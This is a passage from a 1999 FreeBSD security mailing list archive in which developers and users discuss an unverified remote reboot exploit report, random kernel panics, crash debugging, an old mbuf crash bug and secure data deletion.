Cc: freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG In-Reply-To: References: <19990504210951.3781215C1E@hub.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org We had kernel panics resulting in spontaneous reboots in 2.2.7 when we removed the ATAPI_STATIC option. The swap partition was on an IDE drive, so we figured that the problem was VM-related. I sent information to a few lists sometime back, but I don't know if any of the core team members ever followed up. We haven't dared to remove that option since. --Brett At 05:18 PM 5/4/99 -0700, Jorge Aldana wrote: >So, rebooting when a machine is overloaded is not a problem? > >It seems (from the current and past questions to security and questions >mail lists) that something is going on with this. Just because we can't >solve it doesn't mean its not there, mysterious re-boots seem to be >occuring at my site off and on. As soon as we up the debuging nothing >happens (this alone changes a variable within the system), as most sites >and people I've talked to we lack time, from debuging and actually keeping >the systems running. I have seen too many variables in determining what >caused a system to crash and repeating a case never has resulted in a >reproduction of said problem. > >It seems from the responses that this is an acceptable symptom of FreeBSD >3.1 (release and stable)? > > >From my logs, machines have stayed up since FreeBSD 3.1 Stable was >installed (19990303) and others have rebooted the next day and all >combinations in between (but none are consistent). > >It may or may not help but that has been my experince. > >Jorge > >On Tue, 4 May 1999, Mike Uttech wrote: > > > We used to have problems with one of our 3.1-RELEASE boxes randomly > > locking up with no logs of why. We decided to split the load off of the > > one machine and have not had a problem with it locking up since. If my > > memory serves me today, I remember reading about a problem in the > > 3.1-RELEASE distribution that under heavy load caused the system to hang or > > reboot. I personally feel that many of these people (the ones who are > > saying they have been having random reboots) are not being attacked in > > anyway but rather are having their machines overloaded and rebooting. > > > > > > Mike > > > > > > At 03:53 PM 5/4/99 , Warner Losh wrote: > > >In message Vince Vielhaber writes: > > >: It's typically in bad taste to post it to BugTraq before contacting the > > >: vendor. > > > > > >I can say that no one appears to have contacted security-officer about > > >this. People have contacted us in the past saying that their machine > > >randomly reboots. When pressed for details, or to enable ddb or crash > > >dumps to see why the machine is rebooting, they disappear and nothing > > >further is heard from them. > > > > > >Warner > > > > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > > >with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 21: 2:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from narcissus.net (narcissus.net [209.73.230.146]) by hub.freebsd.org (Postfix) with ESMTP id 349B415810 for ; Tue, 4 May 1999 21:02:14 -0700 (PDT) (envelope-from ben@narcissus.net) Received: by narcissus.net (Postfix, from userid 1000) id 18AF816D; Tue, 4 May 1999 23:53:39 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by narcissus.net (Postfix) with SMTP id 0AA3016B; Tue, 4 May 1999 23:53:39 -0400 (EDT) Date: Tue, 4 May 1999 23:53:38 -0400 (EDT) From: Snob Art Genre To: Darren Reed Cc: "Jordan K. Hubbard" , dillon@apollo.backplane.com, des@ifi.uio.no, security@FreeBSD.ORG Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit In-Reply-To: <199905050257.MAA07852@cheops.anu.edu.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 5 May 1999, Darren Reed wrote: > So at this point, are you or one of the other freebsd people going to > post a reply to bugtraq requesting more information and/or denying that > it is a problem until it can be proved more conclusively ? Being on the > cusp of a release & Usenix, this needs to be settled one way or another. If the fellow's moving, as someone posted, then there won't likely be any responses forthcoming from him just yet, and he has been mailed privately -- but it seems to me that a followup post from someone official- ish might be good for PR reasons. Ben @narcissus.net -- finally To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 21:35:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from phoenix.unacom.com (phoenix.unacom.com [206.113.48.50]) by hub.freebsd.org (Postfix) with SMTP id BB6FB15725 for ; Tue, 4 May 1999 21:35:36 -0700 (PDT) (envelope-from geniusj@phoenix.unacom.com) Received: (qmail 38227 invoked by uid 1000); 5 May 1999 04:35:35 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 5 May 1999 04:35:35 -0000 Date: Wed, 5 May 1999 00:35:35 -0400 (EDT) From: The Tech-Admin Dude To: Don Lewis Cc: Warner Losh , Darren Reed , freebsd-security@FreeBSD.ORG Subject: Re: freebsd mbuf crash In-Reply-To: <199905050003.RAA06539@salsa.gv.tsc.tdk.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Raise NMBCLUSTERS in kernel config file On Tue, 4 May 1999, Don Lewis wrote: > On May 4, 3:03pm, Warner Losh wrote: > } Subject: Re: freebsd mbuf crash > } In message <199905041526.BAA29421@cheops.anu.edu.au> Darren Reed writes: > } : is this one (below) taken care of ? perhaps a derivitice of this ? > } > } What's it supposed to do? I can't get it to cause any grief on my > } -current system, nor on the 3.1-stable based systems we have here at > } work. > > I believe this was fixed by version 1.103 of sys/netinet/ip_input.c. > This change was made shortly after 3.0-RELEASE. > > The original exploit code only ran correctly on Linux (and nuked FreeBSD > machines). It didn't do anything interesting when run under FreeBSD, because > the byte order of various IP headers sent on raw sockets differs between > Linux and FreeBSD. This caused various sanity checks in the FreeBSD stack > to toss the packet instead of sending it. If you tweak the byte order in > the exploit code, you can get it to run under FreeBSD and crash vulnerable > FreeBSD machines. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 22:39:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 851D315C1C for ; Tue, 4 May 1999 22:39:31 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from zippy.cdrom.com (localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id WAA09233; Tue, 4 May 1999 22:39:04 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: Darren Reed Cc: dillon@apollo.backplane.com, des@ifi.uio.no, security@FreeBSD.ORG Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit In-reply-to: Your message of "Wed, 05 May 1999 12:57:12 +1000." <199905050257.MAA07852@cheops.anu.edu.au> Date: Tue, 04 May 1999 22:39:04 -0700 Message-ID: <9230.925882744@zippy.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > So at this point, are you or one of the other freebsd people going to > post a reply to bugtraq requesting more information and/or denying that > it is a problem until it can be proved more conclusively ? Being on the > cusp of a release & Usenix, this needs to be settled one way or another. I can't speak for the others, but not being one of the security team folks I can say that I have no plans to say anything publically about this. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 23:52:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 893CC152DB for ; Tue, 4 May 1999 23:52:22 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id AAA12765; Wed, 5 May 1999 00:51:38 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id AAA08231; Wed, 5 May 1999 00:51:40 -0600 (MDT) Message-Id: <199905050651.AAA08231@harmony.village.org> To: "Jordan K. Hubbard" Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit Cc: security@FreeBSD.ORG In-reply-to: Your message of "Tue, 04 May 1999 22:39:04 PDT." <9230.925882744@zippy.cdrom.com> References: <9230.925882744@zippy.cdrom.com> Date: Wed, 05 May 1999 00:51:40 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- In message <9230.925882744@zippy.cdrom.com> "Jordan K. Hubbard" writes: : I can't speak for the others, but not being one of the security team : folks I can say that I have no plans to say anything publically about : this. Being the security officer, I can say, without reservation, that I have absolutely nothing to say about this publiclly. I've sent mail to Jamie and to bugtraq asking for an explaination. Got zilch back so far. If and when there is a hole discovered, and the hole appears to be being exploited or easily exploited, then an advisory will be forth coming. So far I have absolutely nothing to go on except conjecture, which is not the basis for any statements or advisories. In generaly, many DoS things are quietly fixed in -stable. Sometimes the folks that fix them know thay are fixing an implementation of what Bruce likes to call panic(3), other times they don't. There really hasn't been anything of earth shaking importance that I've seen go in. Usually it is after the fixes go in that I see exploits start to crop up... Warner -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBNy/qeNxynu/2qPVhAQGl2wP+IipljM57kSENjuxmyvBf43kwLOduJaRo GBgGiAIgL1+M41lKPfr086Na0HCTOKgJB+bBCOsoBh5JknNc3WY3J9QoB+8IdY4B GAFsAN0+Mq4PHPC7xikrYQyXJzLy9/D+uSGtT36ONhZJpvIKUCYeOPV4HcDCvz5g /OnCFosMRU8= =VAE+ -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 23:57:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 9A33115BD4 for ; Tue, 4 May 1999 23:57:10 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id AAA12776; Wed, 5 May 1999 00:56:25 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id AAA08261; Wed, 5 May 1999 00:56:23 -0600 (MDT) Message-Id: <199905050656.AAA08261@harmony.village.org> To: Unknow User Subject: Re: Security advisories Cc: security@FreeBSD.ORG In-reply-to: Your message of "Tue, 04 May 1999 19:56:36 -0300." <372F7B24.E352AEFF@tdnet.com.br> References: <372F7B24.E352AEFF@tdnet.com.br> <372E4911.3A384379@tdnet.com.br> <199905042049.OAA04590@harmony.village.org> Date: Wed, 05 May 1999 00:56:23 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <372F7B24.E352AEFF@tdnet.com.br> Unknow User writes: : You really helped me, but where can i get such fixes? : Is there any central site? Yes. You willl likely want to keep current with at least the kernel portion of -stable. Fixes are committed there from time to time. Sometimes these have security implications, other times they don't. It is hard to know a-priori which ones will result in a potentially exploitable DoS, and which ones won't. The committers generally don't send me a heads up when it could. Often times it is months later that an exploit comes to light. See the handbook section on keeping current with FreeBSD for details on how to get the latest stable branch. : When a user deletes a file, the OS only removes its inode, is there any : utils that writes 1/0 to the Hard Disk blocks ? Not that I'm aware of. The OS will never give those "dirty" blocks to a user w/o first zeroing them. They are still available on the raw device should you have good reason to expunge them from the disk. : And about memory, is there any utils that fill in memory with 1/0 ? No. Again, the OS doesn't give out dirty memory pages, so this generally isn't a problem. The only time it might be a problem is if a user breaks root and starts snooping in memory. However, if that happens, the active memory can be targeted and you likely have bigger problems to worry about. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 1:52: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from amanda.qmpgmc.ac.uk (amanda.qmpgmc.ac.uk [194.81.5.1]) by hub.freebsd.org (Postfix) with ESMTP id 6C51514F0E; Wed, 5 May 1999 01:51:59 -0700 (PDT) (envelope-from greg@qmpgmc.ac.uk) Received: from greg (gquinlan [194.81.0.56]) by amanda.qmpgmc.ac.uk (8.9.3/8.9.3) with SMTP id JAA59044; Wed, 5 May 1999 09:52:12 +0100 (BST) Message-ID: <007a01be99f9$2b9f01e0$380051c2@greg.qmpgmc.ac.uk> Reply-To: "Greg Quinlan" From: "Greg Quinlan" To: , Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) Date: Sun, 9 May 1999 09:51:46 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.2106.4 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I updated to 3.1-Stable (3/05/99) so I am not confusing an earlier bug with the reboots I'm currently experiencing. (which may be my problem: that I was just not up to date and reboots were due to a heavy load related bug) I have set: config kernel root on da0 dumps on da0 options DDB options DDB_UNATTENDED in the kernel Typically unexplained reboots take up to 6-7 days and can occur as often as twice a day! But no reboot yet (2 days)! Greg -----Original Message----- From: Matthew Dillon To: Raymond Wiker Cc: freebsd-stable@FreeBSD.ORG ; security@FreeBSD.ORG Date: 05 May 1999 04:15 Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) > > Setup a serial console and monitor it so you can see the panic message. > > Or, better, configure the kernel to drop into DDB when it panics so you > can do a stack 'trace', and report the results. > > -Matt > Matthew Dillon > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 2:49:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from sentry.granch.ru (sentry.granch.ru [212.20.5.135]) by hub.freebsd.org (Postfix) with ESMTP id 093E815890 for ; Wed, 5 May 1999 02:49:06 -0700 (PDT) (envelope-from shelton@granch.ru) Received: from granch.ru (1001@localhost.granch.ru [127.0.0.1]) by sentry.granch.ru (8.8.8/8.8.7) with ESMTP id QAA18063; Wed, 5 May 1999 16:47:53 +0700 (NSS) (envelope-from shelton@granch.ru) Message-ID: <373013C5.33148183@granch.ru> Date: Wed, 05 May 1999 16:47:49 +0700 From: "Rashid N. Achilov" Organization: Granch Ltd. X-Mailer: Mozilla 4.51 [en] (X11; I; FreeBSD 2.2.7-RELEASE i386) X-Accept-Language: ru, en MIME-Version: 1.0 To: Darren Reed Cc: freebsd-security@FreeBSD.ORG Subject: Re: freebsd mbuf crash References: <199905041526.BAA29421@cheops.anu.edu.au> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Darren Reed wrote: > > is this one (below) taken care of ? perhaps a derivitice of this ? > > darren > > /* freebsd-mbuf-crash.c by Jeff Roberson, (jeffr@nwlink.com). Dec 11 1998. > * I'm only releasing this as an example because the bug hardly ever reliably crashes a machine. > */ Sample does not work :-) Clearly, it does not compile - must reset line "#include " up, below line "#include ", and add line "#include " below. And after successfull compile it does not work :-) Compiled under 2.2.7, probed 2.2.7 also. -- With Best Regards. Rashid N. Achilov (RNA1-RIPE), Granch Ltd. lead engineer e-mail: achilov@granch.ru, tel (383-2) 24-2363 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 4: 1:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from ol.kyrnet.kg (ol.kyrnet.kg [195.254.160.10]) by hub.freebsd.org (Postfix) with ESMTP id E85601559E for ; Wed, 5 May 1999 04:01:06 -0700 (PDT) (envelope-from fygrave@tigerteam.net) Received: from gizmo.kyrnet.kg (gizmo.kyrnet.kg [195.254.160.13]) by ol.kyrnet.kg (8.9.3/8.9.3) with ESMTP id VAA19267; Wed, 5 May 1999 21:23:30 +0600 Received: from localhost (fygrave@localhost) by gizmo.kyrnet.kg (8.9.1a/8.9.1) with ESMTP id QAA13762; Wed, 5 May 1999 16:59:39 +0600 X-Authentication-Warning: gizmo.kyrnet.kg: fygrave owned process doing -bs Date: Wed, 5 May 1999 16:59:39 +0600 (KGST) From: CyberPsychotic X-Sender: fygrave@gizmo.kyrnet.kg To: freebsd-security@freebsd.org Cc: "Michael C. Vergallen" Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) Message-ID: Confirm-receipt-to: fygrave@usa.net MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ~ I don't see how this can be a exploit if you have /etc/hosts.deny and ~ /etc/hosts.allow set up correctly and dont allow rcmd commands on your ~ system.. This is not the case here I believe. if this bug really takes place, I would think that it's on tcp or ip level, so the most you need here, is some port being listened to. ~ I tried to remotely reboot my ftp server here and no it does not ~ work hmm.. depends on how you did that. Assuming from the other reports people send to the list, I believe the problem appears on tcp/ip level _maybe_ with some specific kernel options turned on. I've played with a friend's of mine machine bombing it with various sorts of maliformed tcp/udp and just sick ip datagrams but wasn't able to reproduce this. If anyone expirienced the problem wouldn't mind to share their log files/network traffic dump, I would appreciate that. -- fygrave@tigerteam.net http://www.kalug.lug.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 6:46: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from ares.flash.net (ares.flash.net [209.30.0.41]) by hub.freebsd.org (Postfix) with ESMTP id EF95B15335 for ; Wed, 5 May 1999 06:45:54 -0700 (PDT) (envelope-from amcl@flash.net) Received: from localhost (p33.amax6.dialup.dal1.flash.net [208.194.209.33]) by ares.flash.net (8.9.3/8.9.3) with ESMTP id IAA27060; Wed, 5 May 1999 08:45:48 -0500 (CDT) Received: (from amcl@localhost) by localhost (8.9.3/8.9.3) id IAA01113; Wed, 5 May 1999 08:48:07 -0500 (CDT) (envelope-from amcl) Date: Wed, 5 May 1999 08:48:07 -0500 From: Alan McLean To: Warner Losh Cc: Unknown User , security@freebsd.org Subject: Re: Security advisories Message-ID: <19990505084807.A1046@flash.net> References: <372F7B24.E352AEFF@tdnet.com.br> <372E4911.3A384379@tdnet.com.br> <199905042049.OAA04590@harmony.village.org> <372F7B24.E352AEFF@tdnet.com.br> <199905050656.AAA08261@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <199905050656.AAA08261@harmony.village.org>; from Warner Losh on Wed, May 05, 1999 at 12:56:23AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, May 05, 1999 at 12:56:23AM -0600, Warner Losh wrote: > In message <372F7B24.E352AEFF@tdnet.com.br> Unknow User writes: > > When a user deletes a file, the OS only removes its inode, is there any > > utils that writes 1/0 to the Hard Disk blocks ? > > Not that I'm aware of. The OS will never give those "dirty" blocks to > a user w/o first zeroing them. They are still available on the raw > device should you have good reason to expunge them from the disk. > > > And about memory, is there any utils that fill in memory with 1/0 ? > > No. Again, the OS doesn't give out dirty memory pages, so this > generally isn't a problem. The only time it might be a problem is if > a user breaks root and starts snooping in memory. However, if that > happens, the active memory can be targeted and you likely have bigger > problems to worry about. Here's an interesting paper and implementation about that http://www.cs.auckland.ac.nz/~pgut001/secure_del.html http://gsu.linux.org.tr/wipe/ -amcl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 6:55:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from fed-ef1.frb.gov (fed.frb.gov [132.200.32.32]) by hub.freebsd.org (Postfix) with ESMTP id 6BFB11505E; Wed, 5 May 1999 06:55:16 -0700 (PDT) (envelope-from seth@freebie.dp.ny.frb.org) Received: by fed-ef1.frb.gov; id JAA29368; Wed, 5 May 1999 09:54:25 -0400 (EDT) Received: from m1pmdf.frb.gov(192.168.3.38) by fed.frb.gov via smap (V4.2) id xma028951; Wed, 5 May 99 09:53:51 -0400 Date: Wed, 05 May 1999 09:53:44 -0400 (EDT) From: Seth Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) In-reply-to: To: "Michael C. Vergallen" Cc: Tim Priebe , Greg Quinlan , freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG Message-id: MIME-version: 1.0 Content-type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Just out of curiosity, how were you attempting to remotely reboot your ftp server? SB On Wed, 5 May 1999, Michael C. Vergallen wrote: > I don't see how this can be a exploit if you have /etc/hosts.deny and > /etc/hosts.allow set up correctly and dont allow rcmd commands on your > system..I tried to remotely reboot my ftp server here and no it does not > work on that machine and I also tried on my gateway machine and no luck > there either. Now I will try my print server but I first have to upgrade > that box to 3.1 ...However on my network I see more and more poeple > scanning with a portscanner so I supose I better keep a look out for > strange items in my log files. > > Michael > --- > Michael C. Vergallen A.k.A. Mad Mike, > Sportstraat 28 http://www.double-barrel.be/mvergall/ > B 9000 Gent ftp://ftp.double-barrel.be/pub/linux/ > Belgium tel : 32-9-2227764 Fax : 32-9-2224976 > > On Wed, 5 May 1999, Tim Priebe wrote: > > > I saw such behavior Sunday when trying to implement a new firewall. The > > system would repeatedly panic with a trap 12. This would happen > > immediatelly after the login prompt appeared after the previous panic. > > The system would be stable, if I removed the first ethernet cable, plug > > the cable back in, and a short while later it would start over again. > > It was late, and we had to get the system working again, so we restored > > to the previous system. I have some information logged for packets at > > the time. I will check this and try to reproduce after I finish the > > course I am on this week. > > > > Tim. > > > > Greg Quinlan wrote: > > > > > > This sounds so.. so very familiar!! > > > > > > I have been the target of exploits before...... > > > > > > The exact same thing I have been experiencing........but not for about 5 > > > days now! > > > > > > I'm not convinced its a pure exploit.. (i.e. a program specifically written > > > for the purpose) > > > > > > Greg > > > > > > -----Original Message----- > > > From: Karl Denninger > > > To: chris@calldei.com ; Jordan K. Hubbard > > > > > > Cc: Mike Smith ; Seth ; > > > freebsd-stable@FreeBSD.ORG ; > > > security@FreeBSD.ORG ; jamie@exodus.net > > > > > > Date: 04 May 1999 05:20 > > > Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) > > > > > > >On Mon, May 03, 1999 at 10:51:32PM -0500, Chris Costello wrote: > > > >> On Mon, May 3, 1999, Jordan K. Hubbard wrote: > > > >> > > I have to say that Jamie really let us down by not running a raw > > > >> > > tcpdump alongside the second targetted machine here. Any chance of > > > >> > > provoking these people into "demonstrating" the exploit on a machine, > > > >> > > while another connected to the same wire is running > > > >> > > > > >> > I'd say he or whomever first reported this to bugtraq let us down even > > > >> > more by releasing an "advisory" in such an unknown and unverifyable > > > >> > state. By doing so, all they've done is hand ammunition to the FUD > > > >> > corps and given us no reasonable chance to respond since the advisory > > > >> > > > >> I get the impression that that was the whole point of the > > > >> bugtraq post, to give us more grief. > > > > > > > >Ding! > > > > > > > >Give that man a cigar. > > > > > > > >Anyone who saw this done to one machine and didn't *immediately* configure > > > >machine #2 to trap and trace on the second instance deserves raspberries - > > > >at a minimum. > > > > > > > >Its one thing to have it done "anyonmously" (among other things you might > > > >not be there when it goes "boom" under those conditions!) Its another to > > > >have it done under controlled conditions and neither get an explanantion > > > >OR trap the condition that caused it yourself with a tcpdump trace. > > > > > > > >-- > > > >-- > > > >Karl Denninger (karl@denninger.net) Web: fathers.denninger.net > > > >I ain't even *authorized* to speak for anyone other than myself, so give > > > >up now on trying to associate my words with any particular organization. > > > > > > > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > > > >with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-stable" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-stable" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 11:32:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from dingo.cdrom.com (dingo.cdrom.com [204.216.28.145]) by hub.freebsd.org (Postfix) with ESMTP id 721A714FE5; Wed, 5 May 1999 11:32:10 -0700 (PDT) (envelope-from mike@dingo.cdrom.com) Received: from dingo.cdrom.com (localhost.cdrom.com [127.0.0.1]) by dingo.cdrom.com (8.9.3/8.8.8) with ESMTP id LAA01118; Wed, 5 May 1999 11:30:58 -0700 (PDT) (envelope-from mike@dingo.cdrom.com) Message-Id: <199905051830.LAA01118@dingo.cdrom.com> X-Mailer: exmh version 2.0.2 2/24/98 To: Simon Karpen Cc: Raymond Wiker , freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) In-reply-to: Your message of "Tue, 04 May 1999 10:34:50 EDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 05 May 1999 11:30:58 -0700 From: Mike Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Tue, 4 May 1999, Raymond Wiker wrote: > > > I have two other machines running 3.1-RELEASE in a slightly > > less hostile environment (i.e, no direct connections outwards), and > > they have been much more stable. I cannot rule out a hardware problem > > on the 486; I'll know for sure as soon as I upgrade it. > > I have 3.1-STABLE in a fairly hostile network environment. > I've found that the following will make the system unstable > and reboot. If you avoid all of thses, it's solid as a rock. > (otherwise you get the reboots) > > VESA support > VM86 support Naturally, it'd be really handy if you actually qualified what it is about these that cause your system to reboot. I'd be very dubious about the simple presence of either of these items causing random reboots, and the dearth of supporting information you've offered makes it much harder to help you. -- \\ Sometimes you're ahead, \\ Mike Smith \\ sometimes you're behind. \\ mike@smith.net.au \\ The race is long, and in the \\ msmith@freebsd.org \\ end it's only with yourself. \\ msmith@cdrom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 12:56:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id CCA6E14CE3 for ; Wed, 5 May 1999 12:56:08 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id MAA17622; Wed, 5 May 1999 12:54:56 -0700 (PDT) Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id MAA18606; Wed, 5 May 1999 12:54:56 -0700 Received: from softweyr.com (dyn5.utah.xylan.com) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA06321; Wed, 5 May 99 12:54:49 PDT Message-Id: <3730A208.75596C9B@softweyr.com> Date: Wed, 05 May 1999 13:54:48 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en Mime-Version: 1.0 To: Brett Glass Cc: Jacob Zehnder , security@FreeBSD.ORG Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remotereboot exploit References: <4.2.0.37.19990504212515.045d3100@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brett Glass wrote: > > What would be the motivation for FUDding FreeBSD in this way? I would not > panic, but I would also ask for more information and would not dismiss the > report out of hand. The tone of Jordan's message makes him look defensive > rather than cautious and diligent. We just heard from the security-officer that followup emails have been made and that no other reports of exploits have been posted. Being the security officer is not Jordan's job, he was simply informing us that he wouldn't be saying anything about this until more is known. If it were widespread, we'd be hearing from CERT. The fact that no information whatsoever was included in the post points out that the poster had no intention of helping in any way. What his motiviations for this are we cannot tell. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 13: 6:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 64E0214C8F for ; Wed, 5 May 1999 13:06:31 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id NAA28216; Wed, 5 May 1999 13:06:10 -0700 (PDT) (envelope-from dillon) Date: Wed, 5 May 1999 13:06:10 -0700 (PDT) From: Matthew Dillon Message-Id: <199905052006.NAA28216@apollo.backplane.com> To: Wes Peters , Brett Glass , Jacob Zehnder Cc: security@FreeBSD.ORG Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remotereboot exploit References: 